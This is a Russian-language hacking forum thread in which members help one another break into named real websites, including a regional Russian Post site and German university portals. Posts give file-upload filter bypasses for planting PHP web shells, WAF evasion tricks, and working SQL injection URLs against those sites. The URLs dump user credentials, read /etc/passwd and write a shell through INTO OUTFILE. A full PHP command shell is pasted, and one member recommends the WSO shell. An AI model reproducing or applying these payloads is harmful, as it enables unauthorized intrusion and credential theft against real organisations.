Еще одни вопрос. Нашел я на сайте папку manual -> site/manual/ здесь что то про apache. Можно что то вытащить?

teh said:
Еще одни вопрос. Нашел я на сайте папку manual -> site/manual/ здесь что то про apache. Можно что то вытащить?


Нет!

Есть доступ в админке Торрент пиер, версия 2.4 Stable (R400). Добавлю php расширения чтоб залить шелл, загружаю пхп шелл, но расширении шелла после загрузки изменяется вот таком виде _php_. Есть ли еще способы залить шелл? Уважаемые помогите.

d4rk73rr0r said:
Есть доступ в админке Торрент пиер, версия 2.4 Stable (R400). Добавлю php расширения чтоб залить шелл, загружаю пхп шелл, но расширении шелла после загрузки изменяется вот таком виде _php_. Есть ли еще способы залить шелл? Уважаемые помогите.


py, shtml, cgi, pl, phtml

А вообще надо посмотреть по какой маске файл переименовывается.

BigBear said:
py, shtml, cgi, pl, phtml
А вообще надо посмотреть по какой маске файл переименовывается.


Видно что обрабатывается регуляркой, к перечисленному можно также поиграться с регистром букв в расширении.

winstrool said:
Видно что обрабатывается регуляркой, к перечисленному можно также поиграться с регистром букв в расширении.


Спасибо, сделал как вы сказали Шелл залился. но еще один косяк появился "403 Forbidden". Видимо там есть .htaccess. А можно ли таким способам залить пустой .htaccess?

Ребята, так от же код есть! https://get.torrentpier.me/?old=1 Качните и посмотрите код что да и как там кому нужно.

Помогите раскрутить)


Code:
http://www.hs-karlsruhe.de/studierende/career-services/existenzgruendung/umfrage-start-up/umfrageformular-start-up.html?tx_powermail_pi1%5Baction%5D=confirmation&tx_powermail_pi1[__referrer][@extension]=Powermail&tx_powermail_pi1[__trustedProperties]=a:2:{s:5:%22field%22;a:5:{s:6:%22UID332%22;i:1;s: 6:%22UID333%22;i:1;s:6:%22UID338%22;i:1;s:6:%22UID 334%22;i:1;s:4:%22__hp%22;i:1;}s:4:%22mail%22;a:1: {s:4:%22form%22;i:1;}}20cf2e8161f6dd6d8c7a69e5ca62 625ea6a4f36a&tx_powermail_pi1[field][__hp]=&tx_powermail_pi1[mail][form]=55

пробелы убрать

DezMond™ said:
Помогите раскрутить)
http://www.hs-karlsruhe.de/studierende/career-services/existenzgruendung/umfrage-start-up/umfrageformular-start-up.html?tx_powermail_pi1%5Baction%5D=confirmation&tx_powermail_pi1%5Bcontroller%5D=Form&cHash=f8f137890d3817d3727763dae1f992e8&tx_powermail_pi1[__referrer][@extension]=Powermail&tx_powermail_pi1[__referrer][@vendor]=In2code&tx_powermail_pi1[__referrer][@controller]=Form&tx_powermail_pi1[__referrer][@action]=form&tx_powermail_pi1[__referrer][arguments]=YTowOnt933ee592c1ea331a0ad70f6f1eed3a529cb0297aa&tx_powermail_pi1[__trustedProperties]=a:2:{s:5:%22field%22;a:5:{s:6:%22UID332%22;i:1;s: 6:%22UID333%22;i:1;s:6:%22UID338%22;i:1;s:6:%22UID 334%22;i:1;s:4:%22__hp%22;i:1;}s:4:%22mail%22;a:1: {s:4:%22form%22;i:1;}}20cf2e8161f6dd6d8c7a69e5ca62 625ea6a4f36a&tx_powermail_pi1[field][UID332]=Nein&tx_powermail_pi1[field][UID333]=na&tx_powermail_pi1[field][UID338]=a&tx_powermail_pi1[field][UID334]=a&tx_powermail_pi1[field][__hp]=&tx_powermail_pi1[mail][form]=55


Подчисти сначала сам, прояви уважение.

В этой лапше я так и не понял какие параметры не фильтруются.

5maks5 said:
Подчисти сначала сам, прояви уважение.
В этой лапше я так и не понял какие параметры не фильтруются.


урезал, см. тот же пост

DezMond™ said:
урезал, см. тот же пост


Дружище, что ты куришь?

Как ??? Как ты ищешь такие сайты ???

Это какой-то dork ??

BigBear said:
Дружище, что ты куришь?
Как ??? Как ты ищешь такие сайты ???
Это какой-то dork ??


Такие сайты попадаются на typo3... что поделать-то(

Здраствуйте. Помогите разобратся. Нашел скулю и все хорошо, нашел таблицу user, нашел в ней столбцы User, Password. Хочу вывести но когда сталю

id=-561'+union+select+1,User,Password,4,5,6,7+FROM+use r+--+

ничего не выводить. Помогите, как зделать?

teh said:
Здраствуйте. Помогите разобратся. Нашел скулю и все хорошо, нашел таблицу user, нашел в ней столбцы User, Password. Хочу вывести но когда сталю
id=-561'+union+select+1,User,Password,4,5,6,7+FROM+use r+--+
ничего не выводить. Помогите, как зделать?


захексить или зачарить, или добавить лимит, или заюзать что-то типа:

INSERT(insert(table_schema,1,0,0x3a3a3a),1,0,tAble _Name)

MAKE_SET(1|2,@@version,USER())

EXPORT_SET(1,user(),version(),',',2)

LPAD('Chat','8','Anti')

или обойти WAF,например, если

403: Access Forbidden

Обходится элементарно с помощью "(" и ")", /**/, %0А, %0d, %09, %20 и т.д., или

Sucuri WebSite Firewall - CloudProxy - Access Denied

Обходится так: union/*123*/select

и т.д.

Короче, вобщем смотря по ситуации что там.

или поля пустые

teh said:
Здраствуйте. Помогите разобратся. Нашел скулю и все хорошо, нашел таблицу user, нашел в ней столбцы User, Password. Хочу вывести но когда сталю
id=-561'+union+select+1,User,Password,4,5,6,7+FROM+use r+--+
ничего не выводить. Помогите, как зделать?


Может быть кодировка.

concat_ws(0x3a,convert(user%20using%20utf8),conver t(password%20using%20utf8))

Вот скуля

www.volgufps.ru/pochtamt5.php?pocht=-1+union+select+1,2,url,4,5,6,7+from+news--

ничего не выводит, что тут делать?

teh said:
Вот скуля
www.volgufps.ru/pochtamt5.php?pocht=-1+union+select+1,2,url,4,5,6,7+from+news--
ничего не выводит, что тут делать?


Дело в том, что надо указывать бд

http://www.volgufps.ru/pochtamt5.php?pocht=-1+union+select+1,2,url,4,5,6,7+from+konkurs.news--

http://www.volgufps.ru/pochtamt5.php?pocht=-1+union+select+1,User,Password,4,5,6,7+from+ftpuse rs.users--

а вообще

root

mq off

узнал бд. называется ufps. и подставляю, получается

http://www.volgufps.ru/pochtamt5.php?pocht=-1+union+select+1,User,Password,4,5,6,7+from+ufps.u sers--

все равно ошибка, пожалуйста подскажите, что такое?

teh said:
узнал бд. называется ufps. и подставляю, получается
http://www.volgufps.ru/pochtamt5.php?pocht=-1+union+select+1,User,Password,4,5,6,7+from+ufps.u sers--
все равно ошибка, пожалуйста подскажите, что такое?


ufps это current_table. а тебе нужна база, в которой лежит таблица users. а лежит она в базе ftpusers


Code:
from ftpusers.users

faza02 said:
ufps это current_table. а тебе нужна база, в которой лежит таблица users. а лежит она в базе ftpusers

Code:
from ftpusers.users



А как вы узнали что таблица лежить в базе ftpusers. Никак немогу понять, можете рассказать пожалуйста

teh said:
А как вы узнали что таблица лежить в базе ftpusers. Никак немогу понять, можете рассказать пожалуйста




http://www.volgufps.ru/pochtamt5.php?pocht=-1+union+select+1,version(),(select(@x)from(select( @x:=0x00),(select(0)from(information_schema.column s)where(table_schema!=0x696e666f726d6174696f6e5f73 6368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,ta ble_schema,0x2e,table_name,0x3a,column_name))))x), 4,5,6,7+--


либо почитай мануал, как узнать таблици и колонки в БД


http://www.volgufps.ru/pochtamt5.php?pocht=-1+union+select+1,version(),table_name,4,5,6,7+from +information_schema.tables+--


права БД рутовые, кавычки не фильтруются и не слешируются:


http://www.volgufps.ru/pochtamt5.php?pocht=%27-1%27+union+select+1,version(),load_file(%27/etc/passwd%27),4,5,6,7+from+mysql.user+--


вам остается только найти врайтабельную папку и залить шелл

P.S: 2011 УФПС Волгоградской области

- филиал ФГУП «Почта России»

Помните об ответственности ломая подобные ресурсы!!!

Cпасибо парни, помогли

P.S. Спасибо, забыл совсем про отвественость

Есть blind sql injection, как правильно узнать длинну получаймой колонки. Использую такой запрос:


Code:
SELECT IF (SUBSTRING(LENGTH(login),{x},1) = {y}, SLEEP(5), 0) FROM users LIMIT 1

где {y} перебираймые значения "0,1,2,3,4,5,6,7,8,9"

Проблема в том, что substring возвращает "0", когда положение {x} вышло за длинну записи. В итоге получается, что при попытке получить второе значение (x=2), а истинная длинна = 5, то получаем, что длинна колонки = 50.

Собственно задача - правильно узнать длинну содержимого колонки, без лишних запросов.

upd. Решено

scr1m77 said:
Есть blind sql injection, как правильно узнать длинну получаймой колонки. Использую такой запрос:

Code:
SELECT IF (SUBSTRING(LENGTH(login),{x},1) = {y}, SLEEP(5), 0) FROM users LIMIT 1

где {y} перебираймые значения "0,1,2,3,4,5,6,7,8,9"
Проблема в том, что substring возвращает "0", когда положение {x} вышло за длинну записи. В итоге получается, что при попытке получить второе значение (x=2), а истинная длинна = 5, то получаем, что длинна колонки = 50.
Собственно задача - правильно узнать длинну содержимого колонки, без лишних запросов.



может вместо login пехать что-нить такое: select column_name from information_schema.tables where table_name='users'

http://shop.priddybooks.com/SearchResultsNew.aspx?order=asc&search=123


есть тут что нибудь?

Br@!ns said:
есть тут что нибудь?


Есть, mssql-инъекция.

YaBtr said:
Есть, mssql-инъекция.


Так же думаю, но раскрутить не получается. Дадите наводку?

Br@!ns said:
есть тут что нибудь?




YaBtr said:
Есть, mssql-инъекция.


Нету

Присутствует фильтрация символов, в случае ошибки вываливает редирект вот сюда (http://shop.priddybooks.com/default-error-page/?aspxerrorpath=/SearchResultsNew.aspx)

5maks5 said:
Нету
Присутствует фильтрация символов, в случае ошибки вываливает редирект
вот сюда (http://shop.priddybooks.com/default-error-page/?aspxerrorpath=/SearchResultsNew.aspx)


Читайте, изучайте!

https://technet.microsoft.com/en-us/library/cc512676.aspx

PHP:
http://www.hochschulkompass.de/studium/suche/profisuche/search/1/studtyp/3.html?tx_szhrksearch_pi1%5Bxtend%5D=1&tx_szhrksearch_pi1%5Bbundesland%5D%5B0%5D=2&tx_szhrksearch_pi1%5Bresults_at_a_time%5D=100&tx_szhrksearch_pi1[pointer]=1&tx_szhrksearch_pi1[detail]=all&tx_szhrksearch_pi1%5Bbesform%5D%5B0%5D=d'+union+se lect+null,version()||chr(58)||current_user||chr(58 )||current_database()+--

Как выковырять данные be_users.username ?

PS движок типо3, эти данные там есть точно!

DezMond™ said:

PHP:
http://www.hochschulkompass.de/studium/suche/profisuche/search/1/studtyp/3.html?tx_szhrksearch_pi1%5Bxtend%5D=1&tx_szhrksearch_pi1%5Bbundesland%5D%5B0%5D=2&tx_szhrksearch_pi1%5Bresults_at_a_time%5D=100&tx_szhrksearch_pi1[pointer]=1&tx_szhrksearch_pi1[detail]=all&tx_szhrksearch_pi1%5Bbesform%5D%5B0%5D=d'+union+se lect+null,version()||chr(58)||current_user||chr(58 )||current_database()+--

Как выковырять данные be_users.username ?
PS движок типо3, эти данные там есть точно!


уверены?


Code:
http://www.hochschulkompass.de/studium/suche/profisuche/search/1/studtyp/3.html
?tx_szhrksearch_pi1[xtend]=1
&tx_szhrksearch_pi1[bundesland][0]=2
&tx_szhrksearch_pi1[results_at_a_time]=100
&tx_szhrksearch_pi1[pointer]=1
&tx_szhrksearch_pi1[detail]=all
&tx_szhrksearch_pi1[besform][0]=d'+union+select+null,table_name+from+information_ schema.tables--

Здраствуйте. Помогите узнать, я на сайт кидаю шелл, но как его прочитать? Как узнать, куда на сайте заливаются файлы? В какую папку?

teh said:
Здраствуйте. Помогите узнать, я на сайт кидаю шелл, но как его прочитать? Как узнать, куда на сайте заливаются файлы? В какую папку?


покажи код шела

OxoTnik said:
покажи код шела


Он не мой, скачал непомню откуда


PHP:
This program is free software; you c an redistribute it and/or modify it under the terms of the GN U General Public License as published by the Free Software Foundation; either versio n 2 of the License, or (at your option ) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; witho ut even the implied warranty of MERCHANT ABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License f or more details. You can get a co py of the GNU General Public License from this address: http://www.gnu.org/copyleft/gpl.html#SEC1 You can also write to the� �Free Software Foundation, Inc., 59 Temple � � Place - Suite 330, Boston, MA 02111-1307, USA. */ /* There are no user-configurable settings in this file anymore, please see * config.php instead. */ /* This error handler will turn all notices, warnings, and errors into fatal * errors , unless they have been suppressed with the @-operator. */ function error_handler($errno, $errstr, $errf ile, $errline, $errcontext) { /* The @-opertor (used with chdir() below) temporarely makes * error_reporting() return z ero, and we don't want to die in that cas e. * We do note the error in the output, though. */ if (error_reporting() == 0) { � � $_SESSION['output'] .= $errstr . "\n"; } else { die(' PHP Shell 2.1 Fatal Error! ' . $errstr . ' in ' . $errfile . ', line ' . $errline . '. P lease consult the README, INSTALL, and SECUR ITY files for instruction on how to use PHP Shell. Copyright © 2 000–2005, Martin Geisler. Get the latest � �version at mgeisler.net/php-shell/. '); } } /* Installing our error handler makes PHP di e on even the slightest problem. * This is what we want in a security critical app lication like this. */ set_error_handler('error_handler'); functio n logout() { /* Empty the session data, except for the ' authenticated' entry which the * re st of the code needs to be able to check. */ $_SESSION = array('authenticated' => false); /* Unset the client's cookie, if it has one . */ // if (isset($_COOKIE[session_name()])) // setcookie(session_name(), '', ti me()-42000, '/'); /* Destroy the session data on the server. This prevents the simple * replay attach where one uses the back button to� �re-authenticate using * the old POST data since the server wont know the session then.*/ // session_destroy(); } function strip slashes_deep($value) { if (is_array($va lue)) return array_map('stripsla shes_deep', $value); else � � return stripslashes($value); } if (get_ma gic_quotes_gpc()) $_POST = stripslashes _deep($_POST); /* Initialize some variables we need again a nd again. */ $username = isset($_POST['username']) ? $_POST['username'] : ''; $password = isset($_POST['password']) ? $_POST['password'] : ''; $nounce = isset($_POST['nounce']) ? $_POST['nounce'] : ''; $command = isset($_POST['command']) ? $_POST['command'] : ''; $rows = isset($_POST['rows']) ? $_POST['rows'] : 24; $columns = isset($_POST['columns']) ? $_POST['columns'] : 80; /* Load the configuration. */ $ini = parse_ini_file('config.php', true); � �if (empty($ini['settings'])) $ini['settings'] = array(); /* Default settings --- these settings should always be set to so mething. */ $default_settings = array('home-directory' => '.'); /* Merge settings. */ $ini['settings'] = array_merge($default_settings, $ini['settings']); session_start(); /* Delete the session data if the user requ ested a logout. This leaves the * sessi on cookie at the user, but this is not im portant since we * authenticates on $_SESS ION['authenticated']. */ if (isset($_POST['logout'])) logout(); /* Attempt authentication. */ if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && isset($ini['users'][$username])) { if (strchr($ini['users'][$username], ':') === false) { // No seperator found, assume this is a pass word in clear text. $_SESSION['authenticated'] = ($ini['users'][$username] == $password); } else { � � list($fkt, $salt, $hash) = explode(':', $ini['users'][$username]); $_SESSION['authenticated'] = ($fkt($salt . $password) == $hash); } } /* Enforce default non-authenticated state if the above code didn't set it * already. */ if (!isset($_SESSION['authenticated'])) $_SESSION['authenticated'] = false; if ($_SESSION['authenticated']) { /* Initialize the session variables. */ if (empty($_SESSION['cwd'])) { $_SESSION['cwd'] = realpath($ini['settings']['home-directory']); $_SESSION['history'] = array(); $_SESSION['output'] = ''; } if (!empty($co mmand)) { /* Save the command for late use in the Ja vaScript. If the command is � � * already in the history, then the old entry is removed before the � �* new entry is put into the list at the� �front. */ if (($i = array_search($comma nd, $_SESSION['history'])) !== false) unset($_S ESSION['history'][$i]); array_unshif t($_SESSION['history'], $command); /* Now append the commmand to the output. */ $_SESSION['output'] .= '$ ' . $command . "\n"; /* Initialize the current working directory. */ if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $command)) { $_SES SION['cwd'] = realpath($ini['settings']['home-directory']); } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) { /* The current command is a 'cd' command wh ich we have to handle � � * as an internal shell command. */ if ($regs[1]{0} == '/') { /* Absolute path, we use it unchanged. */ $new_dir = $re gs[1]; } else { � � /* Relative path, we append it to the curre nt working * directory. */ $new_dir = $_S ESSION['cwd'] . '/' . $regs[1]; } /* Transform '/./' into '/' */ while (strpos($new_dir, '/./') !== false) $ new_dir = str_replace('/./', '/', $new_dir); /* Transform '//' into '/' */ while (strpos($new_dir, '//') !== false) $ new_dir = str_replace('//', '/', $new_dir); /* Transform 'x/..' into '' */ while (preg_match('|/\.\.(?!\.)|', $new_dir)) � � $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir); if ($new_dir == '') $new_d ir = '/'; /* Try to change directory. */ if (@chdir($new_dir)) { $_SESSION['cwd'] = $new_dir; } else { $_SESSION['output'] .= "cd: could not change to: $new_dir\n"; } } elseif (trim($command) == 'exit')� �{ logout(); � � } else { /* The command is not an internal command, so we execute it after * changing the directory and save the o utput. */ chdir($_SESSION['cwd']); // We canot use putenv() in safe mode. � � if (!ini_get('safe_mode')) {� � // Advice programs (ls for example) of the t erminal size. pu tenv('ROWS=' . $rows); putenv('COLUMNS=' . $columns); } /* Alias expansion. */ $length = strcspn($com mand, " \t"); $token = substr($com mand, 0, $length); if (isset($ini['aliases'][$token])) $command = $ ini['aliases'][$token] . substr($command, $length); $io = array(); $p = proc_open($command, array(1� �=> array('pipe', 'w'), 2 => array('pipe', 'w')), � � $io); /* Read output sent to stdout. */ while (!feof($io[1])) { $_SESSION['output'] .= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8'); } � � /* Read output sent to stderr. */ while (!feof($io[2])) { $_SESSION['output'] .= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8'); } � � fclose($io[1]); fclose($io[2]); proc_close($p); � � } } /* Build the command history for use in the JavaScript */ if (empty($_SESSION['history'])) { $js_command_hist = '""'; } else { $escaped = array_map('addslashes', $_SESSION['history']); $js_command_hist = '"", "' . implode('", "', $escaped) . '"'; } }?> PHP Shell 2.1 � � var current_line = 0; var command_hi st = new Array(); var last = 0; function key(e) { if (!e) var e = window.event; if (e.keyCode == 38 && current_line 0) { command_hist[current_line] = document.shell.command.value; cu rrent_line--; document.shell.command.value = co mmand_hist[current_line]; } } function init() { document.shell.setAttribute("autocomplete", "off"); document.shell.output.scrollTop = do cument.shell.output.scrollHeight; documen t.shell.command.focus(); } fun ction init() { document.shell.username. focus(); } PHP Shell� �2.1 " method="post"> Authentication Login failed, please try again:'."\n"; else echo" Please login:\n";?> Username: [/COLOR]"> Password: [/COLOR]"> Current Working Directory: [/COLOR]" rows=""> $ [/COLOR]" tabindex="1"> Size: [/COLOR]"> × [/COLOR]"> Please cons ult the README, INSTALL, and SECURITY files� �for instruction on how to use PHP Shell. Copyright © 2000–2005, Martin Geisler. Get the latest version at mgeisler.net/php-shell/. [/COLOR]

teh said:
Он не мой, скачал непомню откуда

PHP:
This program is free software; you c an redistribute it and/or modify it under the terms of the GN U General Public License as published by the Free Software Foundation; either versio n 2 of the License, or (at your option ) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; witho ut even the implied warranty of MERCHANT ABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License f or more details. You can get a co py of the GNU General Public License from this address: http://www.gnu.org/copyleft/gpl.html#SEC1 You can also write to the� �Free Software Foundation, Inc., 59 Temple � � Place - Suite 330, Boston, MA 02111-1307, USA. */ /* There are no user-configurable settings in this file anymore, please see * config.php instead. */ /* This error handler will turn all notices, warnings, and errors into fatal * errors , unless they have been suppressed with the @-operator. */ function error_handler($errno, $errstr, $errf ile, $errline, $errcontext) { /* The @-opertor (used with chdir() below) temporarely makes * error_reporting() return z ero, and we don't want to die in that cas e. * We do note the error in the output, though. */ if (error_reporting() == 0) { � � $_SESSION['output'] .= $errstr . "\n"; } else { die(' PHP Shell 2.1 Fatal Error! ' . $errstr . ' in ' . $errfile . ', line ' . $errline . '. P lease consult the README, INSTALL, and SECUR ITY files for instruction on how to use PHP Shell. Copyright © 2 000–2005, Martin Geisler. Get the latest � �version at mgeisler.net/php-shell/. '); } } /* Installing our error handler makes PHP di e on even the slightest problem. * This is what we want in a security critical app lication like this. */ set_error_handler('error_handler'); functio n logout() { /* Empty the session data, except for the ' authenticated' entry which the * re st of the code needs to be able to check. */ $_SESSION = array('authenticated' => false); /* Unset the client's cookie, if it has one . */ // if (isset($_COOKIE[session_name()])) // setcookie(session_name(), '', ti me()-42000, '/'); /* Destroy the session data on the server. This prevents the simple * replay attach where one uses the back button to� �re-authenticate using * the old POST data since the server wont know the session then.*/ // session_destroy(); } function strip slashes_deep($value) { if (is_array($va lue)) return array_map('stripsla shes_deep', $value); else � � return stripslashes($value); } if (get_ma gic_quotes_gpc()) $_POST = stripslashes _deep($_POST); /* Initialize some variables we need again a nd again. */ $username = isset($_POST['username']) ? $_POST['username'] : ''; $password = isset($_POST['password']) ? $_POST['password'] : ''; $nounce = isset($_POST['nounce']) ? $_POST['nounce'] : ''; $command = isset($_POST['command']) ? $_POST['command'] : ''; $rows = isset($_POST['rows']) ? $_POST['rows'] : 24; $columns = isset($_POST['columns']) ? $_POST['columns'] : 80; /* Load the configuration. */ $ini = parse_ini_file('config.php', true); � �if (empty($ini['settings'])) $ini['settings'] = array(); /* Default settings --- these settings should always be set to so mething. */ $default_settings = array('home-directory' => '.'); /* Merge settings. */ $ini['settings'] = array_merge($default_settings, $ini['settings']); session_start(); /* Delete the session data if the user requ ested a logout. This leaves the * sessi on cookie at the user, but this is not im portant since we * authenticates on $_SESS ION['authenticated']. */ if (isset($_POST['logout'])) logout(); /* Attempt authentication. */ if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && isset($ini['users'][$username])) { if (strchr($ini['users'][$username], ':') === false) { // No seperator found, assume this is a pass word in clear text. $_SESSION['authenticated'] = ($ini['users'][$username] == $password); } else { � � list($fkt, $salt, $hash) = explode(':', $ini['users'][$username]); $_SESSION['authenticated'] = ($fkt($salt . $password) == $hash); } } /* Enforce default non-authenticated state if the above code didn't set it * already. */ if (!isset($_SESSION['authenticated'])) $_SESSION['authenticated'] = false; if ($_SESSION['authenticated']) { /* Initialize the session variables. */ if (empty($_SESSION['cwd'])) { $_SESSION['cwd'] = realpath($ini['settings']['home-directory']); $_SESSION['history'] = array(); $_SESSION['output'] = ''; } if (!empty($co mmand)) { /* Save the command for late use in the Ja vaScript. If the command is � � * already in the history, then the old entry is removed before the � �* new entry is put into the list at the� �front. */ if (($i = array_search($comma nd, $_SESSION['history'])) !== false) unset($_S ESSION['history'][$i]); array_unshif t($_SESSION['history'], $command); /* Now append the commmand to the output. */ $_SESSION['output'] .= '$ ' . $command . "\n"; /* Initialize the current working directory. */ if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $command)) { $_SES SION['cwd'] = realpath($ini['settings']['home-directory']); } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) { /* The current command is a 'cd' command wh ich we have to handle � � * as an internal shell command. */ if ($regs[1]{0} == '/') { /* Absolute path, we use it unchanged. */ $new_dir = $re gs[1]; } else { � � /* Relative path, we append it to the curre nt working * directory. */ $new_dir = $_S ESSION['cwd'] . '/' . $regs[1]; } /* Transform '/./' into '/' */ while (strpos($new_dir, '/./') !== false) $ new_dir = str_replace('/./', '/', $new_dir); /* Transform '//' into '/' */ while (strpos($new_dir, '//') !== false) $ new_dir = str_replace('//', '/', $new_dir); /* Transform 'x/..' into '' */ while (preg_match('|/\.\.(?!\.)|', $new_dir)) � � $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir); if ($new_dir == '') $new_d ir = '/'; /* Try to change directory. */ if (@chdir($new_dir)) { $_SESSION['cwd'] = $new_dir; } else { $_SESSION['output'] .= "cd: could not change to: $new_dir\n"; } } elseif (trim($command) == 'exit')� �{ logout(); � � } else { /* The command is not an internal command, so we execute it after * changing the directory and save the o utput. */ chdir($_SESSION['cwd']); // We canot use putenv() in safe mode. � � if (!ini_get('safe_mode')) {� � // Advice programs (ls for example) of the t erminal size. pu tenv('ROWS=' . $rows); putenv('COLUMNS=' . $columns); } /* Alias expansion. */ $length = strcspn($com mand, " \t"); $token = substr($com mand, 0, $length); if (isset($ini['aliases'][$token])) $command = $ ini['aliases'][$token] . substr($command, $length); $io = array(); $p = proc_open($command, array(1� �=> array('pipe', 'w'), 2 => array('pipe', 'w')), � � $io); /* Read output sent to stdout. */ while (!feof($io[1])) { $_SESSION['output'] .= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8'); } � � /* Read output sent to stderr. */ while (!feof($io[2])) { $_SESSION['output'] .= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8'); } � � fclose($io[1]); fclose($io[2]); proc_close($p); � � } } /* Build the command history for use in the JavaScript */ if (empty($_SESSION['history'])) { $js_command_hist = '""'; } else { $escaped = array_map('addslashes', $_SESSION['history']); $js_command_hist = '"", "' . implode('", "', $escaped) . '"'; } }?> PHP Shell 2.1 � � var current_line = 0; var command_hi st = new Array(); var last = 0; function key(e) { if (!e) var e = window.event; if (e.keyCode == 38 && current_line 0) { command_hist[current_line] = document.shell.command.value; cu rrent_line--; document.shell.command.value = co mmand_hist[current_line]; } } function init() { document.shell.setAttribute("autocomplete", "off"); document.shell.output.scrollTop = do cument.shell.output.scrollHeight; documen t.shell.command.focus(); } fun ction init() { document.shell.username. focus(); } PHP Shell� �2.1 " method="post"> Authentication Login failed, please try again:'."\n"; else echo" Please login:\n";?> Username: [/COLOR]"> Password: [/COLOR]"> Current Working Directory: [/COLOR]" rows=""> $ [/COLOR]" tabindex="1"> Size: [/COLOR]"> × [/COLOR]"> Please cons ult the README, INSTALL, and SECURITY files� �for instruction on how to use PHP Shell. Copyright © 2000–2005, Martin Geisler. Get the latest version at mgeisler.net/php-shell/. [/COLOR]



Понятно, залей WSO и будет счастье

OxoTnik said:
Понятно, залей WSO и будет счастье


можете, пожалуйста, обьяснить или кинуть силку, что б почитать что такое WSO

teh said:
можете, пожалуйста, обьяснить или кинуть силку, что б почитать что такое WSO


поиск пробовали? /thread103155.html

faza02 said:
поиск пробовали? /thread103155.html


спасибо

http://www1.ids-mannheim.de/oea/forsch/forsch1.html?database=projekte&schlagwort=Kriegsberichterstattung&id=0&table=swforsch+union+select+111,222,333,444,555,66 6,777,888,999,1000,1111,1222,1333+from+information _schema.tables+--+

вывод не вижу(

блинд не крутится(

какие ещё варианты?

DezMond™ said:
http://www1.ids-mannheim.de/oea/forsch/forsch1.html?database=projekte&schlagwort=Kriegsberichterstattung&id=0&table=swforsch+union+select+111,222,333,444,555,66 6,777,888,999,1000,1111,1222,1333+from+information _schema.tables+--+
вывод не вижу(
блинд не крутится(
какие ещё варианты?




Code:
http://www.ids-mannheim.de/cosmas2//projekt/referenz/korpora1.html?sigle=T13&archiv=W%27+union+select+1,2,3,4,5,6,7,version(),9--+&id=0

может лучше так?

faza02 said:

Code:
http://www.ids-mannheim.de/cosmas2//projekt/referenz/korpora1.html?sigle=T13&archiv=W%27+union+select+1,2,3,4,5,6,7,version(),9--+&id=0

может лучше так?


лучше, только не та база(

DezMond™ said:
лучше, только не та база(


лень перебрать пять строчек лимита?


Code:
http://www.ids-mannheim.de/cosmas2//projekt/referenz/korpora1.html?sigle=T13&archiv=W%27+div+0+union+select+1,2,3,4,5,6,7,schem a_name,9+from+information_schema.schemata+limit+3, 1--+

faza02 said:
лень перебрать пять строчек лимита?

Code:
http://www.ids-mannheim.de/cosmas2//projekt/referenz/korpora1.html?sigle=T13&archiv=W%27+div+0+union+select+1,2,3,4,5,6,7,schem a_name,9+from+information_schema.schemata+limit+3, 1--+



я все ввидел эти базы, не они, мне нужна таблица be_users

тут не в одной таблице нету(

DezMond™ said:
я все ввидел эти базы, не они, мне нужна таблица be_users
тут не в одной таблице нету(


не понимаю. если вы не нашли вывод, откуда вы знаете, что эта таблица там есть?

вот ваша sqli:


Code:
http://www1.ids-mannheim.de/oea/forsch/forsch1.html?database=projekte

database: projekte


Code:
http://www.ids-mannheim.de/cosmas2//projekt/referenz/korpora1.html?sigle=T13&archiv=W%27+div+0+union+select+1,2,3,4,5,6,7,schem a_name,9+from+information_schema.schemata+limit+3, 1--+

вывод: Archiv: projekte

т. е. серв mysql, вероятно, один.

Пытаюсь загрузить шелл через SQL-инъекцию


Code:
'-1'+union+select+1,2,0x273c3f706870206576616c28245f 4745545b9165925d29203f3e27,4,5,6,7+from+mysql.user +into+outfile+'/usr/local/www/data/l00k.php'+--+

При обращении к localhost/l00k.php -

выдаёт

Parse error: syntax error, unexpected T_LNUMBER, expecting ']' in /usr/local/www/data/l00k.php on line 1

Unknowhacker said:
Пытаюсь загрузить шелл через SQL-инъекцию

Code:
'-1'+union+select+1,2,0x273c3f706870206576616c28245f 4745545b9165925d29203f3e27,4,5,6,7+from+mysql.user +into+outfile+'/usr/local/www/data/l00k.php'+--+

При обращении к localhost/l00k.php -
выдаёт
Parse error: syntax error, unexpected T_LNUMBER, expecting ']' in /usr/local/www/data/l00k.php on line 1


зачем текст шелла в кавычках и сверху еще hex?

у вас там и так все нормально льется.


Code:
union+select+1,2,%27%27,4,5,6,7+from+mysql.user+in to+outfile+%27/usr/local/www/data/555.php%27--+

Unknowhacker said:
Пытаюсь загрузить шелл через SQL-инъекцию

Code:
'-1'+union+select+1,2,0x273c3f706870206576616c28245f 4745545b9165925d29203f3e27,4,5,6,7+from+mysql.user +into+outfile+'/usr/local/www/data/l00k.php'+--+

При обращении к localhost/l00k.php -
выдаёт
Parse error: syntax error, unexpected T_LNUMBER, expecting ']' in /usr/local/www/data/l00k.php on line 1


у Вас кавычки в гет параметра e неправильны еще в добавок! Вы с ворда наверно вставляли)

faza02 said:
у вас там и так все нормально льется.


Нет, 1 2

Warning: system() [function.system]: Cannot execute a blank command in /usr/local/www/data/555.php on line 1

4 5 6 7

ну так попробуйте выполнить ls, например

Unknowhacker said:
Нет, 1 2
Warning: system() [function.system]: Cannot execute a blank command in /usr/local/www/data/555.php on line 1
4 5 6 7


blank - пустой

Вы вызываете шелл-код с пустыми параметрами.

Как и сказал faza02 передайте какой-либо аргумент в функцию вызова.

Здрасвуйте! Помогите разобраться, заливаю php файл, на сайт. И он доступен по силке

site/folder//file.php?file=2278 но сразу начинаеться скачивание, а можно сделать так чтоб он отображался на сайте?

teh said:
